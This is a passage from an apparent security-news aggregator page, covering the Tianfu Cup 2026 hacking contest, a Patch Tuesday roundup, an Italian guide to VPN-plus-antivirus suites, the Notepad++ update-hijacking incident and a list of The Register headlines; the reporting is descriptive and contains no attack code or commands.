device privileges and data.” In the operating systems category, hackers were invited to demonstrate exploits against Windows 11, Ubuntu, macOS, UOS, and KylinOS. The browsers category included Chrome, Edge, and Safari. Targeted cloud and virtualization products included VMware ESXi, Oracle VirtualBox, ZStack Cloud, QEMU, and Docker Engine, with participants being asked to gain elevated privileges on the host system. Hackers were also invited to fully compromise cybersecurity products from Hillstone Networks, Palo Alto Networks, and the Chinese firm Topsec. The target list also included Microsoft Exchange Server and Coremail mail servers; WeChat, Feishu (Lark), Teams, Zoom, and DingTalk communication apps; and PostgreSQL, Dameng, TiDB, KingbaseES, GBase, and Redis databases. Office applications such as Microsoft Office 365, WPS Office, Foxit PDF Editor, Adobe Acrobat Reader, Sogou, Weaver E-cology, Seeyon, and Yonyou YonBIP were also on the list. Tianfu Cup 2026 also had an AI category that included Hugging Face, Ollama, OpenLLM, vLLM, Text Generation Inference (TGI), Dify, RagFlow, Coze Studio, LangChain, and ComfyUI, with the goal of achieving remote code execution in the default configuration. New rules and smaller prizes An industry insider with knowledge of the Tianfu Cup told SecurityWeek that “rules and targets have changed a lot” this year, but could not provide additional information. Natto Thoughts noted that this year’s event featured a track in which participants used AI agents to identify vulnerabilities during the competition. Another new track focused on reproducing exploits for known vulnerabilities. While there appears to be no public information on individual rewards from this year’s competition, a press release from China’s MPS states a total prize pool of CN¥ 1 million (approximately $140,000), significantly smaller than five years ago. The exploits will likely go to the Chinese government Regulations implemented by China in 2021 require Chinese citizens who discover a zero-day vulnerability to report the details to the government and not disclose it to any third party outside the country. One year later, Microsoft warned that Chinese nation-state threat actors had been leveraging the law to stockpile zero-days for their sophisticated attacks. Evidence indicates that the exploits demonstrated at previous editions of the Tianfu Cup were used in cyberespionage operations by Chinese state-sponsored groups, and Natto Thoughts believes the vulnerabilities disclosed now will face a similar fate. “The central role of the MPS in organizing the competition, combined with past episodes that raised long-standing suspicions and the absence of transparent [coordinated vulnerability disclosure] rules, suggests a system oriented toward vulnerability retention and state control rather than on vendor notification or coordinated disclosure,” the threat intel firm noted. Related: $2.5 Million Offered at Upcoming ‘Matrix Cup’ Chinese Hacking Contest Related: Singapore: Rootkits, Zero-Day Used in Chinese Attack on Major Telecom Firms Related: Notepad++ Supply Chain Hack Conducted by China via Hosting Provider
securityweek.comFeb 13, 2026extracted
Over 60 Software Vendors Issue Security Fixes Across OS, Cloud, and Network Platforms
It's Patch Tuesday, which means a number of software vendors have released patches for various security vulnerabilities impacting their products and services. Microsoft issued fixes for 59 flaws, including six actively exploited zero-days in various Windows components that could be abused to bypass security features, escalate privileges, and trigger a denial-of-service (DoS) condition. Elsewhere, Adobe released updates for Audition, After Effects, InDesign Desktop, Substance 3D, Bridge, Lightroom Classic, and DNG SDK. The company said it's not aware of in-the-wild exploitation of any of the shortcomings. SAP shipped fixes for two critical-severity vulnerabilities, including a code injection bug in SAP CRM and SAP S/4HANA (CVE-2026-0488, CVSS score: 9.9) that an authenticated attacker could use to run an arbitrary SQL statement and lead to a full database compromise. The second critical vulnerability is a case of a missing authorization check in SAP NetWeaver Application Server ABAP and ABAP Platform (CVE-2026-0509, CVSS score: 9.6) that could permit an authenticated, low-privileged user to perform certain background Remote Function Calls without the required S_RFC authorization. "To patch the vulnerability, customers must implement a kernel update and set a profile parameter," Onapsis said. "Adjustments in user roles and UCON settings might be required to not interrupt business processes." Rounding off the list, Intel and Google said they teamed up to examine the security of Intel Trust Domain Extensions (TDX) 1.5, uncovering five vulnerabilities in the module (CVE-2025-32007, CVE-2025-27940, CVE-2025-30513, CVE-2025-27572, and CVE-2025-32467), and nearly three dozen weaknesses, bugs, and improvement suggestions. "Intel TDX 1.5 introduces new features and functionality that bring confidential computing significantly closer to feature parity with traditional virtualization solutions," Google said. "At the same time, these features have increased the complexity of a highly privileged software component in the TCB [Trusted Computing Base]." Software Patches from Other Vendors Security updates have also been released by other vendors in recent weeks to rectify several vulnerabilities, including — ABB Amazon Web Services AMD AMI Apple ASUS AutomationDirect AVEVA Broadcom (including VMware) Canon Check Point Cisco Citrix Commvault ConnectWise D-Link Dassault Systèmes Dell Devolutions dormakaba Drupal F5 Fortinet Foxit Software FUJIFILM Fujitsu Gigabyte GitLab Google Android and Pixel Google Chrome Google Cloud Grafana Hikvision Hitachi Energy HP HP Enterprise (including Aruba Networking and Juniper Networks) IBM Intel Ivanti Lenovo Linux distributions AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu MediaTek Mitsubishi Electric MongoDB Moxa Mozilla Firefox and Thunderbird n8n NVIDIA Phoenix Contact QNAP Qualcomm Ricoh Rockwell Automation Samsung Schneider Electric ServiceNow Siemens SolarWinds Splunk Spring Framework Supermicro Synology TP-Link WatchGuard Zoho ManageEngine Zoom, and Zyxel
thehackernews.comFeb 11, 2026extracted
Guida alle migliori VPN con antivirus del 2026: criteri di scelta per la sicurezza all-in-one
Un antivirus con VPN integrata può garantire una protezione completa e aggiornata contro le minacce digitali in costante aumento. Phishing, ransomware, malware avanzati e tracciamenti online sono sempre più frequenti e minacciano quotidianamente la sicurezza di migliaia di utenti. Indice degli argomenti Un antivirus non si limita più a rilevare e neutralizzare virus ma offre protezione in tempo reale da tentativi di furto d’identità, attacchi zero-day e siti web malevoli. Aggiungendo una VPN (Virtual Private Network) si ottiene anche la cifratura del traffico internet e l’occultamento dell’indirizzo IP, due elementi essenziali per navigare in modo anonimo e sicuro soprattutto su reti Wi-Fi pubbliche o non protette. Questo diventa particolarmente rilevante per chi lavora in remoto, accede a servizi bancari online o semplicemente desidera maggiore privacy nei propri spostamenti digitali. Oggi molti fornitori combinano antivirus e VPN in un’unica interfaccia semplificata, migliorando l’usabilità e riducendo i costi rispetto all’acquisto separato. Inoltre, questa sinergia tra protezione e anonimato è sempre più importante alla luce delle crescenti restrizioni sui contenuti online e delle tecniche di profilazione sempre più invasive da parte di inserzionisti e piattaforme. 🌍 Server: 7.000+ server in 118 paesi 📱 Massimo dispositivi: 10 📍 IP dedicato: ✔ 🆓 Versione Free: Garanzia rimborso di 30 giorni 💻 Compatibilità: Windows, macOS, Android, iOS 🔐 Sicurezza: IKEv2/IPsec, OpenVPN, NordLynx 👨💻 Assistenza 24/7: ✔ 🏢 Sede legale: Panama 🔥 Offerte attive: SCONTO fino al 63% L’offerta di NordVPN per il 2026 si è evoluta in una vera e propria suite di cybersecurity che va ben oltre la semplice connessione criptata. La struttura dei prezzi premia l’impegno a lungo termine, con sconti che raggiungono il 70% sui piani biennali. NordVPN offre tre diverse durate di abbonamento, 2 anni, 1 anno e 1 mese. I piani sono NordVPN base, NordVPN Plus e NordVPN Ultimate: NordVPN piano Base: include solo la VPN e il monitoraggio di base delle perdite di dati. NordVPN piano Plus, include antivirus: aggiunge la protezione anti-malware che scansiona i file in tempo reale, il blocco dei tracker e il Password Manager (NordPass). Il costo medio per il piano annuale Plus è di circa 5,99 €/mese. NordVPN piano Ultimate: aggiunge anche l’archiviazione cloud da 1 TB e l’assicurazione cyber. NordVPN: piani e costi per l’offerta 2 anni I prezzi indicati rappresentano la quota mensile media, ma il pagamento avviene solitamente in un’unica soluzione anticipata per i primi 24 mesi. Il piano annuale di NordVPN si colloca strategicamente come il “punto di equilibrio” per gli utenti che ricercano un compromesso tra flessibilità contrattuale e contenimento dei costi. Dal punto di vista della pianificazione finanziaria, questa opzione evita l’impegno pluriennale pur garantendo un risparmio significativo (circa il 56-60%) rispetto alla tariffazione mensile ricorrente. Ecco l’analisi tecnica e dei costi relativa alla sottoscrizione di 12 mesi per il 2026: Il pagamento per il piano annuale di NordVPN avviene in un’unica soluzione anticipata al momento dell’attivazione. La struttura dei prezzi riflette il valore degli asset digitali inclusi in ogni pacchetto: NordVPN confronto piani: 1 mese vs 1 anno Dal punto di vista della pianificazione finanziaria, il piano mensile è considerato una “soluzione d’emergenza”, mentre quello annuale rappresenta il punto di equilibrio per chi non desidera un vincolo pluriennale. Il risparmio passando dal piano mensile a quello annuale è superiore al 60%. Sotto il profilo del capitale, il piano da 2 anni costa solo circa 20 € in più rispetto a quello da 1 anno, pur offrendo il doppio del tempo di servizio. Oltre alla pura protezione dei dati, il valore di NordVPN nel 2026 risiede nella sua resilienza infrastrutturale: l’adozione di server solo-RAM assicura che nessuna informazione venga mai scritta su disco rigido, rendendo vana qualsiasi intrusione fisica nei data center. L’ecosistema si completa con la crittografia post-quantistica, una misura precauzionale che protegge le comunicazioni odierne dai futuri attacchi condotti con computer quantistici, posizionando l’abbonamento biennale come un asset di sicurezza a prova di futuro. IL numero di asset che è possibile proteggere simultaneamente con un unico abbonamento NordVPN è stato recentemente aggiornato a 10 dispositivi. Questa quota di mercato permette di coprire l’intera infrastruttura hardware di un nucleo familiare medio o di un ufficio professionale di piccole dimensioni senza costi incrementali. NordVPN: gestione multi-device e limitazioni tecniche L’account con NordVPN permette l’installazione del client su un numero illimitato di terminali, ma il protocollo di rete limita a 10 le connessioni attive nello stesso istante. Sotto il profilo operativo: Efficienza trasversale: è possibile proteggere PC (Windows/macOS), smartphone (Android/iOS), tablet, smart TV e console. Frazionamento del costo: nel piano biennale Base da ~3,39 €/mese, l’incidenza economica per ogni singolo slot di protezione scende a circa 0,34 €/mese, un valore tra i più competitivi del settore cyber-security nel 2026. NordVPN e integrazione con router, moltiplicatore di protezione L’installazione di NordVPN direttamente a livello di router è una strategia caldamente raccomandata dagli espert per massimizzare il ritorno sull’investimento. Effetto di scala: il router viene conteggiato come un singolo dispositivo (1 slot dei 10 disponibili). Tuttavia, esso estende automaticamente la cifratura a tutti gli apparecchi collegati alla rete Wi-Fi (IoT, lampadine smart, telecamere, console di gioco), superando di fatto il limite dei 10 dispositivi. Compatibilità Hardware: non tutti i router supportano la configurazione VPN nativa. I modelli più idonei includono: - Asus (AsusWRT/Merlin): spesso dotati di una configurazione semplificata per NordVPN. - Firmware Open Source: router che supportano DD-WRT, Tomato o OpenWRT. - Router pre-configurati: esistono soluzioni “plug-and-play” (come il modello Privacy Hero II) già ottimizzate per l’ecosistema NordVPN. Esclusioni: i modem/router standard forniti da molti ISP (es. alcuni modelli Arris o router con firmware proprietario blindato) potrebbero non consentire l’installazione manuale, richiedendo l’uso di un router secondario a cascata. 🌍 Server: 3200+ in 100 paesi 📱 Massimo dispositivi: illimitati 🆓 Versione Free: Garanzia rimborso di 30 giorni 💻 Compatibilità: Windows, macOS, Android, iOS 🔐 Sicurezza: OpenVPN, IKEv2, Shadowsocks, Wireguard e L2TP 👨💻 Assistenza 24/7: ✔ 🏢 Sede legale: Paesi Bassi 🔥 Offerte attive: SCONTO fino all’83% + 3 mesi gratis 🔥 L’offerta attuale di Surfshark si configura più come un ecosistema modulare di difesa proattiva, scalabile in base al profilo di rischio dell’utente. Surfshark: piani e costi L’architettura tariffaria di Surfshark è progettata per incentivare la fidelizzazione di lungo periodo, applicando economie di scala che abbattono il costo marginale mensile fino all’87% nelle sottoscrizioni biennali. Caratteristiche tecniche di Surfshark VPN L’efficienza della suite Surfshark poggia su tre pilastri tecnologici fondamentali, aggiornati agli standard di sicurezza del 2026: L’infrastruttura si avvale di oltre 4.500 server RAM-only operanti a 10 Gbps. La tecnologia proprietaria Nexus permette di superare il concetto di tunnel statico, introducendo la rotazione dinamica dell’IP e il MultiHop personalizzabile, garantendo l’anonimato anche contro tecniche di analisi del traffico avanzate. Per mitigare l’esposizione in caso di data breach, Surfshark introduce il modulo Alternative ID, che genera metadati e indirizzi email proxy per preservare i dati reali dell’utente durante le interazioni online. Parallelamente, Surfshark Alert monitora in tempo reale il Dark Web, notificando tempestivamente la compromissione di credenziali o documenti d’identità. Antivirus: protezione in tempo reale con database delle minacce aggiornato ogni 3 ore e scudo specifico per la webcam. Incogni esclusivo piano One+:servizio automatizzato di data removal che agisce come mandatario legale dell’utente per richiedere la cancellazione dei dati personali dai database dei data broker, esercitando i diritti previsti dal GDPR. A differenza dei competitor di fascia premium, Surfshark mantiene la politica dei dispositivi illimitati su tutti i piani. Sotto il profilo economico, questo trasforma l’abbonamento in un asset familiare o per piccoli team, riducendo drasticamente il costo pro-capite della protezione. Con un costo d’ingresso di circa 53,73 € per i primi 27 mesi, il piano Starter si posiziona come il benchmark per il miglior rapporto prezzo-prestazioni nel settore consumer 2026. Surfshark integra un software antivirus proprietario all’interno delle sue suite di sicurezza avanzate. Sebbene il core business dell’azienda sia nato con la VPN, l’offerta si è evoluta verso una soluzione “all-in-one” che include un modulo di protezione contro il malware certificato. È tuttavia fondamentale notare una distinzione tecnica rispetto alla VPN: mentre quest’ultima copre dispositivi illimitati, l’antivirus presenta restrizioni specifiche. Caratteristihe tecniche di Surfshark Antivirus L’antivirus di Surfshark è disponibile esclusivamente sottoscrivendo i piani Surfshark One o Surfshark One+ e offre: Protezione in tempo reale: il sistema monitora costantemente i file e le applicazioni in esecuzione. Il database delle minacce viene aggiornato ogni 3 ore tramite Cloud Protect, garantendo una difesa reattiva contro i malware zero-day. Sicurezza della webcam: include una funzione di Webcam Protection (disponibile su Windows e macOS) che inibisce l’accesso non autorizzato alla telecamera del dispositivo, notificando l’utente in caso di tentativi di attivazione da parte di app terze. Motore di scansione euristica: oltre alla ricerca basata su firme (virus noti), il software utilizza l’analisi euristica per identificare bit di codice sospetti tipici di nuovi ceppi di malware non ancora catalogati. Impatto sulle prestazioni: i benchmark del 2026 confermano che si tratta di un software lightweight. È progettato per operare in background con un consumo minimo di RAM e CPU, evitando i rallentamenti tipici delle suite antivirus tradizionali più pesanti. Su quali piani Surkshark e disponibile l’antivirus È necessario distinguere l’accessibilità del servizio in base al pacchetto scelto: A differenza della VPN Surfshark, che può essere installata su un numero illimitato di terminali, la licenza dell’antivirus è limitata a 5 dispositivi per account. Questa è una prassi comune nel settore della sicurezza endpoint per bilanciare i carichi di scansione sui server cloud.L’integrazione dell’antivirus nel piano One (proposto a 2,49 €/mese nell’offerta 24 mesi) rappresenta un’ottimizzazione dei costi per l’utente, eliminando la necessità di abbonamenti separati per la difesa dai virus e la privacy della connessione. 🌍 Server: 3000 server in 105 paesi 📱 Massimo dispositivi: 8 🆓 Versione Free: Garanzia rimborso di 30 giorni 💻 Compatibilità: Windows, macOS, Android, iOS, Linux 🔐 Sicurezza: IKEv2, OpenVPN 👨💻 Assistenza 24/7: ✔ 🏢 Sede legale: Isole Vergini Britanniche 🔥 Offerte attive: SCONTO fino al 49% + 3 mesi GRATIS ExpressVPN è un software che crea un tunnel cifrato tra il dispositivo dell’utente e uno dei numerosi server presenti in oltre 90 paesi consentendo così di mascherare l’indirizzo IP reale, proteggere il traffico dati e aggirare blocchi geografici imposti da governi, piattaforme di streaming o reti aziendali. L’attuale proposta commerciale di ExpressVPN si configura come un ecosistema di difesa multi-livello adattato alle esigenze di un’utenza che spazia dal consumer avanzato al professionista in mobilità. ExpressVPN: TrustedServer e crittografia post-quantistica Sotto il profilo tecnico, il valore dell’offerta di ExpressVPN risiede nell’infrastruttura TrustedServer. A differenza dei sistemi basati su storage tradizionale, questi server operano esclusivamente su memoria volatile (RAM). Dal punto di vista della sicurezza informatica, ciò garantisce che ogni sessione venga eliminata fisicamente al riavvio, rendendo tecnicamente impossibile la conservazione di log persistenti. L’elemento di maggiore innovazione di ExpressVPN è l’integrazione della protezione post-quantistica all’interno del protocollo proprietario Lightway. Con l’avanzamento del calcolo quantistico, le attuali chiavi di cifratura rischiano l’obsolescenza; l’implementazione di algoritmi resistenti a queste future minacce posiziona il provider in una fascia di mercato “future-proof”, essenziale per la tutela di asset informatici sensibili. ExpressVPN non include un antivirus tradizionale inteso come software di scansione dei file residenti sul disco rigido (endpoint protection). Tuttavia, l’evoluzione del servizio ha portato all’integrazione di funzionalità di sicurezza proattiva che operano a livello di rete, sovrapponendosi parzialmente ad alcune mansioni tipiche degli antivirus moderni. Questa distinzione è fondamentale per un’analisi corretta della postura di sicurezza informatica. Threat Manager: la protezione a livello DNS Invece di scansionare i file dopo il download, ExpressVPN utilizza una funzione chiamata Threat Manager. Questa opera come un filtro di rete che impedisce al dispositivo di comunicare con server noti per ospitare malware o tracker. Blocco siti dannosi: impedisce il caricamento di domini inseriti in blacklist di cybersecurity, prevenendo attacchi di phishing e l’esecuzione di script malevoli. Blocco dei tracker: interrompe la comunicazione tra le app installate e i server di tracciamento di terze parti, limitando la profilazione dei dati. Differenze operative tra VPN e antivirus Mentre un antivirus si occupa della “Security at Rest” (protezione dei file memorizzati), la VPN si occupa della “Security in Transit” (protezione dei dati mentre viaggiano). Struttura dell’offerta di ExpressVPN L’offerta attuale di ExpressVPN è modulata per incentivare la sottoscrizione a lungo termine, applicando sconti decrescenti all’accorciarsi del ciclo di fatturazione. Tutti i piani includono la garanzia di rimborso entro 30 giorni. Il piano da 24 mesi, più 4 mesi bonus di ExpressVPN rappresenta la soglia d’ingresso più competitiva per il mercato italiano: ExpressVPN Base 2,09 € /mese: consente la connessione di 10 dispositivi simultanei. Include il blocco di siti dannosi e annunci (protezione Lite). Il risparmio complessivo rispetto alla tariffazione mensile è stimato nell’ 81%. ExpressVPN avanzato 2,79 €/mese): aumenta il limite a 12 dispositivi e integra un password manager proprietario, riducendo la necessità di abbonamenti terzi. ExpressVPN Pro 4,54 €/mese: destinato a utenti con necessità di rete specifiche, offre 14 connessioni e l’opzione per un IP dedicato, utile per l’accesso a database aziendali che richiedono whitelist statiche. Per cicli di 12 mesi + 3 mesi bonus, il costo mensile del piano ExpressVPN Base sale a 3,14 €, con un risparmio del 72%. È l’opzione preferibile per progetti a termine o consulenze annuali che richiedono un’infrastruttura sicura senza l’impegno del biennio. Con tariffe che partono da 11,49 €/mese, questa modalità è priva di sconti significativi. In termini di economia aziendale, il piano mensile è giustificabile solo per trasferte internazionali in aree ad alto rischio cyber o per test di penetrazione e analisi di rete temporanei. ExpressVPN, funzionalità avanzate e integrazione hardware L’offerta di ExpressVPN si distingue per alcuni strumenti accessori che migliorano l’operatività: Threat Manager: un sistema di prevenzione che blocca tracker e comunicazioni verso domini sospetti a livello DNS. Server offuscati: indispensabili in ambienti con reti restrittive (censura o firewall Deep Packet Inspection), mascherano il traffico VPN come normale traffico HTTPS. Aircove: l’integrazione con router proprietari permette di proteggere a monte l’intera rete locale (inclusi dispositivi IoT non compatibili con app VPN), con sconti dedicati per chi sottoscrive i piani “Avanzato” o “Pro”. L’offerta di ExpressVPN si attesta su una fascia di prezzo premium giustificata da un’architettura server stateless e dall’adozione di standard crittografici all’avanguardia. Per l’utente italiano, la capillarità in 105 paesi e il supporto al protocollo Lightway garantiscono un trade-off ottimale tra latenza e sicurezza. Nel dominio della sicurezza informatica, il dibattito sulla dicotomia tra Virtual Private Network (VPN) e software Antivirus (AV) è stato superato da una visione di sicurezza integrata. Sebbene operino su livelli differenti dello stack tecnologico, la loro azione combinata costituisce la linea di difesa fondamentale per la protezione del capitale digitale, sia in ambito privato che corporate. Mentre l’antivirus agisce sulla sicurezza della fase di archiviazione ed esecuzione (protezione dei dati a riposo), la VPN presiede alla sicurezza della fase di transito (protezione dei dati in movimento). Per comprendere l’efficacia di una difesa stratificata, è necessario mappare le aree di competenza di ciascuna tecnologia: L’antivirus moderno (spesso evoluto in Endpoint Detection and Response – EDR) monitora costantemente i processi locali. Il suo compito è neutralizzare il codice malevolo che potrebbe essere stato scaricato tramite phishing o supporti rimovibili compromessi. Senza un antivirus, una VPN cifrerebbe semplicemente il transito di un malware già presente sul dispositivo, rendendolo paradossalmente “protetto” durante la sua comunicazione con il server di comando e controllo (C2). La VPN interviene nel momento in cui il dato abbandona l’endpoint. Attraverso la creazione di un tunnel cifrato, impedisce a provider di servizi internet (ISP) o malintenzionati su reti Wi-Fi pubbliche di intercettare il contenuto delle comunicazioni. È la componente essenziale per prevenire l’esposizione dei metadati e il tracciamento geografico. La tendenza del mercato: suite di sicurezza All-in-One Le dinamiche economiche del settore cybersecurity mostrano una marcata tendenza verso la convergenza. Molti provider (come NordVPN o Surfshark) offrono pacchetti che integrano entrambi gli strumenti. Tuttavia, sotto il profilo della gestione del rischio, l’adozione di una suite unica presenta pro e contro: Vantaggi: semplificazione della gestione licenze, minore overhead sulle risorse di sistema, interfaccia utente unificata. Rischi: il cosiddetto single point of failure; un’eventuale vulnerabilità critica nell’ecosistema del fornitore potrebbe compromettere contemporaneamente sia il transito che l’integrità del sistema. VPN+antivirus: considerazioni sulla postura di sicurezza L’impiego di una VPN senza antivirus lascia il sistema vulnerabile ad attacchi locali; viceversa, un antivirus senza VPN espone i dati a intercettazioni durante la navigazione. La strategia ottimale prevede l’utilizzo di entrambi gli strumenti come parte di un approccio Zero Trust. Un antivirus con VPN consente di migliorare la protezione quotidiana. Un utilizzo efficace parte dall’attivazione continua della protezione antivirus, mantenendo aggiornato il software per garantire la rilevazione delle minacce più recenti. La maggior parte degli antivirus prevede scansioni automatiche e in tempo reale: è importante non disattivarle, nemmeno quando si naviga su siti noti o si aprono allegati da fonti apparentemente affidabili. La VPN va attivata ogni volta che ci si connette a reti Wi-Fi pubbliche, come quelle di bar, aeroporti o hotel, ma anche quando si desidera evitare il tracciamento pubblicitario o accedere a contenuti geo-bloccati. Idealmente dovrebbe restare attiva durante tutta la navigazione, soprattutto se l’antivirus offre una funzione di attivazione automatica in caso di reti non sicure. Alcuni software permettono anche di escludere dal tunnel VPN determinate app (funzione split tunneling) utile ad esempio per mantenere prestazioni elevate su servizi di streaming o durante le videoconferenze, senza compromettere la sicurezza generale. È consigliabile configurare le impostazioni di notifica per ricevere alert solo quando necessario così da non ignorare messaggi importanti. Infine, molti antivirus con VPN integrata offrono strumenti aggiuntivi come il controllo delle violazioni di dati personali, il monitoraggio delle password salvate o la scansione della rete domestica. Sfruttarli regolarmente può fare la differenza nel prevenire furti d’identità o accessi non autorizzati. Per configurare al meglio un antivirus con VPN il primo passo è assicurarsi di scaricare il software direttamente dal sito ufficiale del produttore o da fonti certificate evitando così versioni compromesse o incomplete. Una volta installato è fondamentale accedere alle impostazioni e abilitare la protezione in tempo reale, assicurandosi che la scansione automatica sia programmata regolarmente, almeno una volta al giorno. Questo consente di identificare tempestivamente file sospetti e minacce emergenti. Per la VPN è opportuno selezionare un server vicino alla propria posizione geografica per garantire prestazioni ottimali in termini di velocità di connessione, salvo nei casi in cui si desideri simulare la navigazione da un altro paese, ad esempio per accedere a contenuti internazionali. Se il software lo consente attivare la funzione di avvio automatico della VPN all’accensione del dispositivo e l’interruttore di emergenza (kill switch) – che blocca la connessione a internet in caso di interruzione della VPN – è una scelta saggia per proteggere la privacy in modo continuo. È utile anche configurare lo split tunneling, laddove disponibile, per consentire ad alcune app o servizi (come quelli bancari) di bypassare la VPN senza compromettere la sicurezza generale. Inoltre, l’antivirus va integrato con altre misure di sicurezza come il monitoraggio delle vulnerabilità del sistema operativo, l’analisi dei comportamenti sospetti e, quando presente, il controllo degli accessi alla webcam e al microfono. Infine, è buona prassi controllare con regolarità il centro notifiche del software per verificare eventuali anomalie e aggiornamenti in sospeso, ed evitare di disattivare protezioni temporaneamente “per comodità”, soprattutto durante download, navigazione su siti sconosciuti o sessioni di lavoro da remoto.
cybersecurity360.itFeb 3, 2026extracted
Notepad++ hijacked by suspected state-sponsored hackers
Notepad++ hijacked by suspected state-sponsored hackers A software update mechanism for the popular text editor Notepad++ was hijacked by suspected Chinese state-sponsored hackers, allowing them to silently redirect some users to malicious update servers, the project’s developers announced on Monday. In a security update posted on the project’s website, the development team said the attack did not exploit a flaw in the editor’s source code itself. Instead, the compromise occurred at the infrastructure level, involving systems used to deliver software updates. The attackers were able to “intercept and redirect update traffic destined for notepad-plus-plus.org” stated the team, adding that the “exact technical mechanism remains under investigation.” Notepad++, a free and open-source editor widely used by tech workers, has millions of users worldwide. The incident underscores ongoing concerns about the security of software supply chains, even for well-established open-source projects. Unlike many supply-chain attacks, which involve tampering with source code repositories, the Notepad++ incident relied on redirecting network traffic after it left a user’s computer but before it reached the legitimate update server. Such “on-path” attacks can be difficult to detect and may leave limited forensic evidence, particularly when they affect only a narrow set of users. Similar tactics have been observed in previous incidents. In 2018, hackers compromised the update delivery infrastructure for ASUS in what researchers called the ShadowHammer campaign. As cybersecurity firm SentinelOne noted, although the malicious updates were distributed to potentially hundreds of thousands of systems, the attackers appeared interested in only a few hundred specific targets. The Notepad++ developers said their incident followed a similar pattern, with update traffic “selectively redirected” for certain users rather than deployed broadly. The team emphasized the campaign was not a mass attack and did not affect all users, though it did not disclose how many systems were ultimately targeted. The hijacking began in June 2025 and continued until December, according to the developers. They cited assessments by multiple independent security researchers who concluded the activity was likely linked to a Chinese state-sponsored threat actor, though the researchers and their methods were not publicly identified. Such attributions are typically based on infrastructure reuse, targeting behavior and operational characteristics rather than direct evidence, and remain difficult to verify conclusively. The developers said the project has since moved its update infrastructure to a new hosting provider and introduced additional security controls in version 8.9.1 to harden the update mechanism. Users have been urged to upgrade as a precaution. “I deeply apologize to all users affected by this hijacking,” the author of the security notice wrote. Alexander Martin is the UK Editor for Recorded Future News. He was previously a technology reporter for Sky News and a fellow at the European Cyber Conflict Research Initiative, now Virtual Routes. He can be reached securely using Signal on: AlexanderMartin.79
therecord.mediaFeb 2, 2026extracted
Microsoft hiring energy strategists to power its Asian datacenters
ai and ML AI slop is good for business if you know what you're doingYour irresponsibility is someone else's opportunity SAAS Salesforce partners not seeing meaningful revenue from Agentforce AI platform, report saysShow us the money ai and ml AI companies are burning books, advocates complain to FTCFahrenheit 203, the temperature GPUs stop gorging on literature DEVOPS Go updates may delight diehard gophers but displease AI overlordsv 1.27 expands generics to support methods EDGE AND IOT Waymo has designed a robocar chip to stay ahead of Tesla5 nm ML accelerators promise 1,000+ TOPS, ultra-low latency Security Russians are posing as Signal support to launch phishing attacksPLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Security Microsoft patches failed to fix on-prem SharePoint, which is now under zero-day attackPLUS: China upgrades smartphone surveillance tools; Ring eases anti-snooping stance; and more Black Hat and DEF CON DEF CON Franklin project enlists hackers to harden critical infrastructureVoting village reports have been so successful, says Jeff Moss, that the whole of DEF CON will now be included Security EQT buys majority share in Swiss cybersecurity biz AcronisWent at equivalent of $3.5B+ valuation for entire firm, though portion sold not specified Malware Month Ten years since the first corp ransomware, Mikko Hyppönen sees no end in sightOn the plus side, infosec's a good bet for a long, stable career FOSS smashed one Microsoft monopoly. After 20 years of failure, it's time to smash anotherWord up GNOME can look like Windows – and Flashback can do it without extensionsNew 'Simple-taskbar' is an option, but there's a simpler, stabler way A moment of silence, please, for the final release of Debian on x86-32New Debian versions hit FOSSland in the form of 13.6 and 12.15 Baddies caught exploiting extensions bugs with perfect 10 scores on vulnerable Joomla websitesFlaws in iCagenda, Balbooa Forms extensions can impact open source CMS that powers a million sites worldwide Frame: A new X11 server – implemented directly in assemblyJoins yserver, Phoenix, and of course XLibre – and outlier Arcan Cinnamon 6.8 will support Wayland – if you want itNext version of Linux Mint’s desktop has both kinds of display server
go.theregister.comJan 19, 2026extracted
Loading 40 more…